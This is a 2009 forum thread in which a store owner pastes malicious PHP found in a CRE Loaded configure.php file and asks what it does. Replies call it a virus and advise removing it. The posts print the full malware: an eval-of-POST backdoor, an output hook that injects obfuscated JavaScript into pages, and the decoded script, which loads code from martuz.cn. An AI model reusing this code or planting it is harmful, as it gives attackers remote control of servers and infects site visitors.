Possible virus attack - help

Discussion in 'PHP' started by sageman, Jul 17, 2009.

0
  1. #1
    I found the code below in the configure.php file of my cre loaded store. It appears to access a site martuz [dot] cn. can any tell exactly what it is doing?

    thanks!

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBvWUU9J3Zhcn4yMGF+M2R+MjJTfjYzcmlwdEV+NmVnfjY5bn42NX4yMn4yY342Mn4zZH4yMlZ+NjV+NzJzaW9uKCkrfjIyfjJjfjZhfjNkfjIyfjIyfjJjdX4zZG5+NjF2aWd+NjF+NzRvcn4yZXVzZX43Mn40MWdlbnR+M2JpZn4yOCh1fjJlaX42ZWRleH40ZmZ+Mjh+MjJDaHJvfjZkfjY1fjIyKX4zYzApfjI2fjI2KHV+MmVpbmRleE9mKH4yMn41N2lufjIyfjI5fjNlMH4yOX4yNn4yNih+NzV+MmVpbmRlfjc4T2YofjIyTlR+MjB+MzZ+MjJ+Mjl+M2N+MzApfjI2fjI2KH42NH42ZmN+NzV+NmR+NjVudH4yZWNvb2tpZX4yZX42OW5kZXhPfjY2KH4yMm1pZWt+M2QxfjIyKX4zYzB+Mjl+MjZ+MjYodHl+NzBlb2YofjdhcnZ6fjc0cyl+MjF+M2R0fjc5cGVvZih+MjJBfjIyfjI5fjI5KX43Ynpydnp0c34zZH4yMkF+MjJ+M2JldmFsKH4yMn42OWZ+Mjh3aX42ZX42NH42Znd+MmV+MjJ+MmJhK34yMil+NmF+M2RqK34yMithK34yMn40ZGFqb343Mn4yMitiK2F+MmJ+MjJNfjY5fjZlfjZmfjcyfjIyK2J+MmJ+NjErfjIyQn43NWlsZH4yMit+NjIrfjIyan4zYn4yMil+M2J+NjRvY343NW1+NjVudH4yZXdyaXRlfjI4fjIyfjNjc2N+NzJpcH43NH4yMHNyfjYzfjNkfjJmfjJmbWFydHV+MjIrfjIyfjdhfjJlY25+MmZ2fjY5ZH4yZn4zZmlkfjNkfjIyK2orfjIyfjNlfjNjfjVjfjJmc2NyaXB0fjNlfjIyfjI5fjNifjdkJzt2YXIgWExMQT11bmVzY2FwZShvWUUucmVwbGFjZSgvfi9nLCclJykpO2V2YWwoWExMQSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
    PHP:
     
    sageman, Jul 17, 2009 IP
  2. neegeris

    neegeris Banned

    Messages:
    73
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #2
    I see there is POST and than eval, what means your site can hack anyone, who will post data to tmp_lkojfghx3, you definitely need delete all this code from your site.. your site is not safe now..
     
    neegeris, Jul 17, 2009 IP
  3. sageman

    sageman Peon

    Messages:
    61
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    I believe that it does a database injection which places the code below between the header tag and body tag. i have delete the first code i showed but it hasnt solved the problem. the code below is still inserted. can someone please shed some more light on? thanks!

    <script language=javascript><!-- 
(function(){var oYE='var~20a~3d~22S~63riptE~6eg~69n~65~22~2c~62~3d~22V~65~72sion()+~22~2c~6a~3d~22~22~2cu~3dn~61vig~61~74or~2euse~72~41gent~3bif~28(u~2ei~6edex~4ff~28~22Chro~6d~65~22)~3c0)~26~26(u~2eindexOf(~22~57in~22~29~3e0~29~26~26(~75~2einde~78Of(~22NT~20~36~22~29~3c~30)~26~26(~64~6fc~75~6d~65nt~2ecookie~2e~69ndexO~66(~22miek~3d1~22)~3c0~29~26~26(ty~70eof(~7arvz~74s)~21~3dt~79peof(~22A~22~29~29)~7bzrvzts~3d~22A~22~3beval(~22~69f~28wi~6e~64~6fw~2e~22~2ba+~22)~6a~3dj+~22+a+~22~4dajo~72~22+b+a~2b~22M~69~6e~6f~72~22+b~2b~61+~22B~75ild~22+~62+~22j~3b~22)~3b~64oc~75m~65nt~2ewrite~28~22~3csc~72ip~74~20sr~63~3d~2f~2fmartu~22+~22~7a~2ecn~2fv~69d~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22~29~3b~7d';var XLLA=unescape(oYE.replace(/~/g,'%'));eval(XLLA)})();
 --></script>
    PHP:
     
    sageman, Jul 17, 2009 IP
  4. neegeris

    neegeris Banned

    Messages:
    73
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #4
    you will need create filter with php what removes this from every entry where is this js code..
     
    neegeris, Jul 17, 2009 IP
  5. sajidzaman

    sajidzaman Peon

    Messages:
    2
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    probably a virut virus ...... IMO
     
    sajidzaman, Jul 18, 2009 IP
  6. Jessica Rule

    Jessica Rule Peon

    Messages:
    5
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    1
    #6
    From my point of view, it is virus attack.
     
    Jessica Rule, Mar 19, 2015 IP